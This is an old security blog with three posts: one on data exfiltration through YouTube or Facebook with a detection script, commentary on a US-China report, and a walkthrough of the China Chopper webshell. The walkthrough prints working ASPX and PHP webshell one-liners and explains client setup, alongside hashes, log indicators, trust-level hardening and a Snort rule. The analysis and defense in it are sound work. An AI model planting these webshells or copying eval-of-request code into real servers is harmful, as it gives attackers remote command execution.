Saturday, November 24, 2012

Concealing Data Exfiltration with Youtube or Facebook

You've probably already read about Backdoor.Makadocs, which uses Google Docs/Google Drive as a command-and-control (C&C) relay. It made quite a stir last week, but unfortunately this isn't a new trick: ACAD/Medre.A was built for the mass exfiltration of AutoCAD drawings and likewise leaned on a legitimate third-party service (ordinary webmail accounts) to transmit the stolen files. I'm sure there are many other examples too.

The use of legitimate sites like Google Docs, Facebook and YouTube seems the obvious choice for attackers wanting to exfiltrate data. The benefit, of course, is the lack of network-level indicators of compromise (IOCs): the destination is a site everyone is allowed to reach, and the content is wrapped in SSL. Could you tell the difference between someone watching a 30-minute clip and someone exfiltrating *.{doc,xls,dwg} files to YouTube or Facebook over SSL? There are already tools available to hide TrueCrypt volumes inside MP4 files. Why not use YouTube or Facebook to exfiltrate data? I haven't read of any incidents involving this, but it's coming.
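One thing that does survive SSL is the direction of the bytes: a viewer pulls a clip down and pushes almost nothing up, while an exfiltration tool does the reverse. The script below is an added example, not part of the original post, that puts that observation to work over a simplified proxy/flow log. The record layout, the watched-site list and the sample records are all constructed for the example; the thresholds are starting points, not tuned values.

```python
"""Added example (not from the original post): flag clients that push far
more bytes to a 'watching' site than they pull from it.

Assumes a simplified proxy/flow log, constructed below, with one record
per request: client IP, destination host, method, bytes sent by the
client and bytes returned by the server.  Someone watching a 30-minute
clip pulls tens of megabytes down and sends almost nothing up; a tool
exfiltrating *.doc/*.xls/*.dwg files to the same site does the reverse.
That asymmetry survives SSL because byte counts are visible even when
the content is not.
"""
from collections import defaultdict

# Sites where heavy *uploads* from a workstation deserve a second look (assumed list).
WATCHED_SITES = ("youtube.com", "facebook.com", "docs.google.com", "drive.google.com")

# Constructed sample records: (client_ip, dest_host, method, bytes_up, bytes_down)
SAMPLE_LOG = [
    ("10.1.1.5",  "www.youtube.com",    "GET",  512,        48_000_000),  # streaming a clip
    ("10.1.1.5",  "www.youtube.com",    "GET",  420,         2_100_000),
    ("10.1.1.9",  "upload.youtube.com", "POST", 9_400_000,       1_200),  # large uploads...
    ("10.1.1.9",  "upload.youtube.com", "POST", 8_900_000,       1_150),  # ...from one host
    ("10.1.1.9",  "www.youtube.com",    "GET",  300,           150_000),
    ("10.1.1.22", "www.facebook.com",   "POST", 150_000,        60_000),  # a normal photo post
    ("10.1.1.22", "intranet.example",   "POST", 30_000_000,      5_000),  # not a watched site
]


def watched_site(host):
    """Return the watched site a hostname belongs to, or None."""
    host = host.lower().rstrip(".")
    for site in WATCHED_SITES:
        if host == site or host.endswith("." + site):
            return site
    return None


def upload_totals(records):
    """Sum bytes up/down per (client, watched site); other traffic is ignored."""
    totals = defaultdict(lambda: [0, 0])
    for client, host, _method, up, down in records:
        site = watched_site(host)
        if site is None:
            continue
        totals[(client, site)][0] += up
        totals[(client, site)][1] += down
    return dict(totals)


def flag_uploaders(records, min_bytes_up=5_000_000, min_ratio=10.0):
    """Clients whose upload volume to a watched site is both large in
    absolute terms and far larger than what they downloaded from it."""
    alerts = []
    for (client, site), (up, down) in upload_totals(records).items():
        ratio = up / max(down, 1)
        if up >= min_bytes_up and ratio >= min_ratio:
            alerts.append({"client": client, "site": site,
                           "bytes_up": up, "bytes_down": down,
                           "ratio": round(ratio, 1)})
    return sorted(alerts, key=lambda a: -a["bytes_up"])


if __name__ == "__main__":
    for a in flag_uploaders(SAMPLE_LOG):
        print(f"{a['client']} -> {a['site']}: {a['bytes_up']} B up, "
              f"{a['bytes_down']} B down (ratio {a['ratio']})")
```

Two caveats for anyone running this for real: without SSL interception most proxies only log the total bytes of a CONNECT tunnel, so the per-direction split has to come from NetFlow or the firewall's byte counters; and a marketing team that legitimately posts video will trip a flat threshold, so baseline per user rather than per site.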

As companies get better at detecting unwanted software and move to legitimate remote-administration programs such as GoToMyPC, the natural path for attackers is to use those same programs as well. Speaking of which, did you know you can control who uses GoToMyPC from your corporate IP space?

"Can I block the unofficial use of GoToMyPC Pro while allowing authorized use?
Yes. Through our free Authorization Management Service (AMS), GoToMyPC Pro will gladly work with you to block selected Internet-visible IPs while still enabling authorized GoToMyPC Pro account access. If you do not currently have a GoToMyPC Pro account but wish to block access by using AMS, please If you are a current GoToMyPC Pro customer, please contact us"
If your company has a policy against using GoToMyPC (and no way to enforce it), you should probably work with Citrix to restrict access. If your company allows it, you should still restrict which accounts are authorized to connect from your address space.


Sunday, November 18, 2012

Fear and Loathing in China - U.S.-China Economic and Security Review Commission

If you haven't heard, the 2012 Report to Congress of the U.S.-China Economic and Security Review Commission is out. I've read through some of it and thought it would benefit the InfoSec community to highlight some of the key points (at least to me) of what I've read.

The first thing that struck me was the branding of the attacks as "advanced persistent threats"; it had all the signs of a marketing campaign from * security vendors. At one point the report states:

"Anecdotally, Chinese hackers’ sophistication may fall short of their counterparts in Russia or elsewhere, but some indicators suggest improving skills. Obscuring the matter is a notable capability gap between various Chinese actors and a common practice of expending the minimum amount of effort necessary to compromise a target. This includes the utilization of widely available tools and known exploits, which require less skill than original or customized exploitation methods."
I interpret this as them adjusting their tactics as we adjust ours: a cat-and-mouse game. They don't need another king when the pawns are doing just fine, and like any good chess player they are already planning their future moves.

"The PLA does not have a deep reservoir of personnel able to manage sophisticated information systems. Chinese military leaders, however, recognize this weakness and intend to develop a pool of soldiers who can conduct or plan joint military operations, manage information systems and cyber technology, and use or maintain advanced weapon systems.The PLA’s goal is to achieve this expanded pool of personnel by 2020."
After reading more of this I start to see their desire for more talent not as a weakness but as a sign of their success. We've all read countless stories proving this. Take NASA, for example: I've been reading about them getting hacked for the last decade (actually more than that; remember The Cuckoo's Egg?).

"For example, the National Aeronautics and Space Administration (NASA) in February disclosed a series of penetrations against its networks. According to testimony to the House Committee on Science, Space, and Technology, Subcommittee on Investigations and Oversight, from Paul K. Martin, NASA inspector general: In FY [fiscal year] 2011, NASA reported it was the victim of 47 APT [Advanced Persistent Threat] *  attacks, 13 of which successfully compromised Agency computers. In one of the successful attacks, intruders stole user credentials for more than 150 NASA employees—credentials that could have been used to gain unauthorized access to NASA systems. Our ongoing investigation of another such attack at JPL [Jet Propulsion Laboratory] involving Chinese-based Internet protocol (IP) addresses has confirmed that the intruders gained full . . . functional control over these [JPL] networks."

I can't help but think that our approach to tackling this problem is poorly strategized. I say this because the approach taken to fight it is analogous to that of a local fire department 20 years ago. Even today many of us still rely on the smoke detectors known in IT as antivirus, or on customers calling the helpdesk (911) to report viruses. A big difference is that our "smoke detectors" can only alert on a fraction of fires.

I certainly don't have a cure-all for this problem, but I do know that as much focus needs to be placed on preventing the execution of malicious software as we typically place on detecting it. Application privileges, and how they are managed, need more attention. This problem is not going away and is only getting worse. On the bright side, tomorrow is Monday ;)

Friday, November 16, 2012

China Chopper Webshell - the 4KB that Owns your Web Server

I've been wanting to blog about China Chopper for some time and finally got around to it. When I first started researching this webshell I couldn't find anything about how to set it up and configure it, so in this post I'll go over the components of China Chopper as well as how to set it up.

China Chopper is a webshell used to remotely control compromised Windows or Linux web servers; it is malicious software used by attackers. As the name suggests, it was developed in China and is used heavily by Chinese hackers.

The software is hosted on, which I might mention has recently changed. 

The webshell consists mainly of two parts: the client interface (caidao.exe) and the small server-side file placed on the compromised web server.

Here are the files included with the download and their MD5s.

caidao.exe              5001ef50c7e869253a7c152a638eab8a

aspRwWithJMail.ccc      a6d6cbfa2ead1d0e8a6735aa49b963ff
aspSpy.ccc              be207c46105c38571ae958ae2da47297
aspx.ccc                cc07ac4caef188334fc330f62e0a574a
php.ccc                 9100b18660f3a1eeca7ea801b357b8ce
phpSpy.ccc              ce1a9fc93040d5c94f789b579fe1c106

Customize.aspx          8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm           ad8288227240477a95fb023551773c84
Customize.jsp           acba8115d027529763ea5c7ed6621499

The file dropped on the compromised server is nice and small: a one-liner that evals whatever arrives in the "password" POST parameter. The client, caidao.exe, communicates directly with that file.

Servers running IIS: place the contents below in a file called webshell.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

Servers running Apache with PHP: place the contents below in a file called webshell.php
<?php @eval($_POST['password']);?>

Next, open caidao.exe

You will see some examples already listed. Let's add the information to communicate with our test compromised Windows 2008 R2 server using the webshell.aspx file mentioned above.

Right-click and select 'Add'; you will see the following dialog box.
The Address field is the URL of the file on the compromised server. The next field acts as a password of sorts: it is the name of the request parameter the server-side file evaluates, so if it doesn't match the parameter name in webshell.aspx ("password" in the line below) the shell won't work.
<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>

Change the file type to ASPX and the codepage to UTF-8.

Click 'Edit' to save your changes. To open a remote shell, right-click on the entry and select 'Virtual Terminal'. If everything is configured correctly you will see the following command interface.

I should note that this works on a fully patched, default-configuration Windows 2008 R2 server with the Web Server role, primarily because ASP.NET runs at Full trust by default. If you lower the trust level to 'High' in web.config, China Chopper (and many other webshells) will not work, because the "unsafe" eval in the one-liner requires full trust.
When the webshell is executing commands you will see the following in Process Explorer: cmd.exe running as a child of the IIS worker process, w3wp.exe.
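As an added illustration of the trust-level change just described (this is not configuration from the original post), here is the weak default beside the hardened setting. The application and framework paths named in the comments are assumptions; test the change first, because applications that genuinely need Full trust will break under High.

```xml
<!-- Added example, not from the original post.  Application web.config
     (assumed path: C:\inetpub\wwwroot\web.config). -->

<!-- BEFORE: Full trust, which is what you get when no <trust> element is
     set anywhere.  eval(..., "unsafe") in webshell.aspx runs unrestricted. -->
<configuration>
  <system.web>
    <trust level="Full" />
  </system.web>
</configuration>

<!-- AFTER: High trust.  The JScript "unsafe" eval needs full trust, so the
     shell's requests now fail instead of handing out a command prompt. -->
<configuration>
  <system.web>
    <trust level="High" />
  </system.web>
</configuration>

<!-- To stop a compromised application from simply overriding this in its own
     web.config, set it in the framework root web.config instead (assumed path:
     %windir%\Microsoft.NET\Framework64\v4.0.30319\Config\web.config) inside a
     <location> element with allowOverride="false". -->
<location allowOverride="false">
  <system.web>
    <trust level="High" originUrl="" />
  </system.web>
</location>
```

This only helps the ASP.NET side of the house; the PHP one-liner on an Apache box is untouched by it.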

IIS logs will show only a POST to the file; the command itself travels in the request body, which IIS does not log. Here is a line copied from the IIS log:
2012-11-16 22:30:14 POST /webshell.aspx - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0 31

The traffic is base64 encoded; here is a snippet from Wireshark during the initial connection and a POST sending the netstat command.

There are many ways to protect against this, so I won't go into them, but it would be a good idea to do some Splunking on HTTP POSTs! If you don't have Splunk, you could use Snort to monitor for this with a simple rule that watches for base64_decode in a POST body.

I put this together quickly as a proof of concept, so no consideration was given to performance. It only catches the PHP variant (base64_decode is a PHP function; the ASPX variant does not use it) and only on port 80, so HTTPS traffic would have to be inspected after TLS termination. Snort may already ship much better rules for detecting base64 in HTTP traffic.
alert tcp any any -> any 80 (msg:"Webshell Detected Apache"; flow:to_server,established; content:"POST"; nocase; http_method; content:"base64_decode"; http_client_body; sid:900001; rev:1;)

I hope this post has been informative and helped you out. If you have any questions, please feel free to contact me.